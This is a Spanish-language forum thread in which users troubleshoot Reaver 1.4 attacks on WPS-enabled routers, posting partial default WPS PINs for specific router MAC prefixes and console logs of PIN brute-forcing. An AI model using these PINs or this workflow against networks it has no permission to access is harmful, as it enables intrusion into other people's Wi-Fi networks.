REAVER: Vulnerabilidad de WPA por WPS habilitado

Iniciado por ChimoC, 15 Enero 2012, 02:25 AM

0 Miembros y 5 Visitantes están viendo este tema.

HalconEye

Todo lo que digan que somos,
lo somos y aún peor.


pachubi

Hago un consulta de quién me pueda ayudar, a mi me llega hasta el pin 09990005 y me lo empieza a repetir y no sale de ahí, cubriendo un 90.90% ya lo he realizado 3 veces y siempre lo mismo quisiera saber que es lo que debo hacer o porque pasa esto, gracias. espero una respuesta.
Lo realizo con el Reaver 1.4 en una iso desde unidad usb, (aclaro que ya he sacado contraseñas WPA2-PSK).

El_Andaluz

#903
 ASOT550: aqui un pequeño aporte de otro foro que vii lo pongo aqui para que probes haber si os sirve. ::)

ESSID: WLAN_XXXX

BSSID: 30:39:F2:XX:XX:XX

MODELO: �

V. Firm: �

Wps Activado: Si

Inicio PIN: 1670@@@@ // 4329@@@@ // 16538061* // 1340@@@@ // 8820@@@@

*pin confirmado


essid > orangeXXXX
modelo >
versión firmware >
bssid >  50:7E:5D:XX:XX:XX
WPA> 10 caracteres hexadecimales (mayúsculas)
WPS> 4255@@@@

¡WPS activado por defecto!

HalconEye

He podido observar pin a pin la secuencia que utiliza reaver una vez obtenidos los cuatro primeros dígitos.
Continúa incrementando de uno en uno con los tres siguientes, y 7 unidades el último ,es decir....XXXX1001,XXXX1018,XXXX1025....pensé que era un patrón..
11113669
11113676
11113683
11113690
11113707

pero también he observado que a veces( creo que de forma aleatoria...ignoro la razón )no sigue esta secuencia en el ultimo numero,sino que en un momento dado lo incrementa en 6 (en vez de 7) el siguiente pin,sólo una vez,para volver a sumar de 7 en 7 otra vez .... pero siempre incrementa de uno en uno los tres siguientes números,respetando esa secuencia,sin dejar ni una...

11116295
11116301
11116318
11116325

Cuando pasa esto
99.98% complete @ 2013-01-04 00:35:08 (8 seconds/pin)
  • Trying pin 11119975
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Sending WSC NACK
  • Trying pin 11119982
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Sending WSC NACK
  • Trying pin 11119982
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
    [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin

  • Trying pin 11119982
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
    [!] WARNING: Receive timeout occurred
  • Received M1 message
  • Sending WSC NACK
  • Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
  • Trying pin 11119982
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Sending WSC NACK
  • 99.99% complete @ 2013-01-04 00:35:38 (8 seconds/pin)
  • Trying pin 11119982

    Y así sigue hasta qwue paro la consola,probando el último pin en un bucle infinito....

    En realidad le falta por probar el pin 11119999 ó el 11119998 por lo que he observado de sumar 6 aleatoriamente,y reaver no prueba estos pines,por eso se queda al 99,99%

    Así que probé metiendo el primero de los que faltaban...mas de lo mismo

  • 90.95% complete @ 2013-01-04 00:47:45 (4 seconds/pin)
  • Trying pin 11119999

    Quise meter el otro,pero no había manera,por alguna razón,siempre empezaba con el 11119999...me quedé observando un rato y veo que prueba siempre el mismo pin,pero el porcentaje va incrementándose,como si lo hiziese probando con pines diferentes

    90.94% complete @ 2013-01-04 00:52:50 (10 seconds/pin)
  • Trying pin 11119999

  • 90.98% complete @ 2013-01-04 00:53:08 (6 seconds/pin)
  • Trying pin 11119999

    [!] WPS transaction failed (code: 0x03), re-trying last pin
  • 91.01% complete @ 2013-01-04 00:53:38 (7 seconds/pin)
  • Trying pin 11119999

    [!] WPS transaction failed (code: 0x02), re-trying last pin
  • 91.04% complete @ 2013-01-04 00:53:59 (7 seconds/pin)
  • Trying pin 11119999
  • 91.07% complete @ 2013-01-04 00:54:25 (7 seconds/pin)
  • Trying pin 11119999
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Trying pin 11119999
    ^C
  • Session saved.


    En fin....yo sólo sé que no sé nada ...:laugh:
Todo lo que digan que somos,
lo somos y aún peor.

P4nd3m0n1um

Cita de: elsevi en  4 Enero 2013, 00:23 AM
ASOT550: aqui un pequeño aporte de otro foro que vii lo pongo aqui para que probes haber si os sirve. ::)

ESSID: WLAN_XXXX

BSSID: 30:39:F2:XX:XX:XX

MODELO: �

V. Firm: �

Wps Activado: Si

Inicio PIN: 1670@@@@ // 4329@@@@ // 16538061* // 1340@@@@ // 8820@@@@

*pin confirmado

30:39:F2:XX:XX:XX /*ADB-Broadband*/

88202907, 16538061, 1670XXXX, 16538061, 4329XXXX, 1340XXXX, 1835XXXX, 8820XXXX, 18355604, 88202907, 1653806, 4329XXXX, 12820078, 19756967, 11967859..


Cita de: elsevi en  4 Enero 2013, 00:23 AM
essid > orangeXXXX
modelo >
versión firmware >
bssid >  50:7E:5D:XX:XX:XX
WPA> 10 caracteres hexadecimales (mayúsculas)
WPS> 4255@@@@

¡WPS activado por defecto!

50:7E:5D:XX:XX:XX  /*Orange-xxxx*/

8840XXXX, 8846XXXX..

/*La Key es de 8 carácteres en mayúscula ( A-F 0-9 ) */


Desde WPSPin Search en Android.

El_Andaluz

 A TI  te sale con mas pin por que ? creeo que la orange-xxxx puede ser una wpa por que si fuera wpa2 tendria esta 26 caracteres verdad como ya dijimos la otra vez en las orange-xxxx me refiero.

P4nd3m0n1um

Wpa o WPA2 a partir de 8 caracteres hasta los 64

statequieta

Bueno, os comento mi experiencia para que valoréis como está la situación.

Trabajo con una Alfa AWUS036H, es decir, chip rtl8187l.

Al usar reaver poniendo el pin por defecto que hay en un post de un foro (no recuerdo ya cual) en el que se indican muchos modelos con sus mac y su pin por defecto, me escupió la pass a la primera. Se trataba de una WLAN_XXXX de mi casa y lo realicé de forma educativa. El pin era el por defecto, y la pass estaba configurada por mi, con lo cual cambiada a la de por defecto.

Sin embargo, debo decir que no he tenido la misma suerte con el resto de redes... Ni vodafone, ni orange, ni ONO. Ni el WPSpin para windows, ni el WPSPIN para android. Nada. Y son ya unas cuantas las redes (siempre de amigos y vecinos con su consentimiento) con las que he probado (yo que les di la barrila con que mejorasen la seguridad y les prometí demostrarle que podría entrar en sus redes...)

Cuando no es:

Warning: Last message not processed properly, reverting state...
Warning: out of order packet received, re-trasmitting last message.

Me encuentro con un simple:

WPS transaction failed, re-trying last pin
Key cracked in x seconds
WPS PIN: "el que había puesto que me había dado el WPSPIN"
Nothing done, nothing to save.

Vamos, que nada.

¿Alguna idea de por qué?

Hay redes que efectivamente la señal no llega muy bien (-70)

Pero la mayoría de ellas he tratado en el propio salón donde estaba el router (ya digo que era en casas de amigos/vecinos que me dejaban entrar en casa a probar) con lo cual problemas de señal no es...

¿Alguna idea?¿Alguna sugerencia?

Para las conclusiones:

Wifiway 3.4, reaver 1.4, y acostumbro a lanzar la línea especificando canal, bssid, essid y essid (así como el pin si procede) nada más.

Saludos!

pachubi

statequieta como se pone el pin por defecto con el reaver yo también utilizo el 1.4